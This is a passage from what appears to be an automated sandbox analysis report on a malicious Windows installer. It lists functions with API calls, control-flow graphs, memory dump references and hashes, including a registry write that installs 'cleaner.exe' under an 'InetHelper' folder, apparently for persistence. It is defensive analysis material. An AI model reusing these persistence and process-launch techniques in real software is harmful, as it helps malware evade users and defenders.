                                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"
                                                                                                                                                                                                              • API String ID: 2655323295-1638566638
                                                                                                                                                                                                              • Opcode ID: 25f827e3e11746b9e5ee3687016ce8942fde3681089ea3dd2e236ad5f1a11635
                                                                                                                                                                                                              • Instruction ID: a6a83690551736ab877e244042d38f3be3a1a43997e1cd9886aee1f7f0d2369c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25f827e3e11746b9e5ee3687016ce8942fde3681089ea3dd2e236ad5f1a11635
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10118471D00104BEEB10AFA5DE89EAEBB74AB44714F11803BF504F71D1DAF88D819B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004031D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 692 4031d6-4031e3 693 403201-40320a call 4032de 692->693 694 4031e5-4031fb SetFilePointer 692->694 697 403210-403223 call 405f61 693->697 698 4032d8-4032db 693->698 694->693 701 4032c8 697->701 702 403229-40323c call 4032de 697->702 704 4032ca-4032cb 701->704 706 403242-403245 702->706 707 4032d6 702->707 704->698 708 4032a4-4032aa 706->708 709 403247-40324a 706->709 707->698 710 4032ac 708->710 711 4032af-4032c6 ReadFile 708->711 709->707 712 403250 709->712 710->711 711->701 713 4032cd-4032d0 711->713 714 403255-40325f 712->714 713->707 715 403261 714->715 716 403266-403278 call 405f61 714->716 715->716 716->701 719 40327a-403281 call 405f90 716->719 721 403286-403288 719->721 722 4032a0-4032a2 721->722 723 40328a-40329c 721->723 722->704 723->714 724 40329e 723->724 724->707
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID: *:o
                                                                                                                                                                                                              • API String ID: 973152223-843036820
                                                                                                                                                                                                              • Opcode ID: 0cc0faf384b4c78b6fdc9eeda5bbee131a155eebafb64ec0174871a4b91cb037
                                                                                                                                                                                                              • Instruction ID: 354a74280fc320ddcd1a03d564711161fa861bb1e5dc1acee3c93741f06a9d18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cc0faf384b4c78b6fdc9eeda5bbee131a155eebafb64ec0174871a4b91cb037
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB316B30200219BBDB109F95ED44A9A3E68EB04759F20417EF904E61D0D7389E51DBA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 725 405f0d-405f19 726 405f1a-405f4e GetTickCount GetTempFileNameW 725->726 727 405f50-405f52 726->727 728 405f5d-405f5f 726->728 727->726 729 405f54 727->729 730 405f57-405f5a 728->730 729->730
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004C1000,004034A3,004D1000,004D5000,004D5000,004D5000,004D5000,004D5000,74DF3420,004036EF), ref: 00405F46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                              • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 731 4059d1-405a02 CreateProcessW 732 405a10-405a11 731->732 733 405a04-405a0d CloseHandle 731->733 733->732
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Error launching installer, xrefs: 004059E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                              • API String ID: 3712363035-66219284
                                                                                                                                                                                                              • Opcode ID: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction ID: 7eb9064dadea35cbfc58acd36067de01cdd5d52a4e03f37d51203587584f4729
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8941ac05e4937e204e88b6b93cbbbbf1e6cab01e5c2f1d465c17e9c6e72d0440
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86E012B0610209BFEB00AFA0ED49F7B7AACFB08204F008921BD00F2191D774A9148A68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(00000000), ref: 00401BE7
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00004004), ref: 00401BF9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                              • String ID: InetHelper
                                                                                                                                                                                                              • API String ID: 3394109436-2767297512
                                                                                                                                                                                                              • Opcode ID: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction ID: 2224cfe726421d4168c30344d3cbfba70e659b3895da8488867bc6a87a7a29a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 176a51b4a66ca6db00c120fdfff2a52918b74a80b70c450353fe484a1e272d38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5321EB72A00200ABDB10EF95CEC49DE73A4AB543187A4403BF506F32D1DB78E891CB6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401E7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00405A14: ShellExecuteExW.SHELL32(?), ref: 00405A23
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32(?,?), ref: 004068A6
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
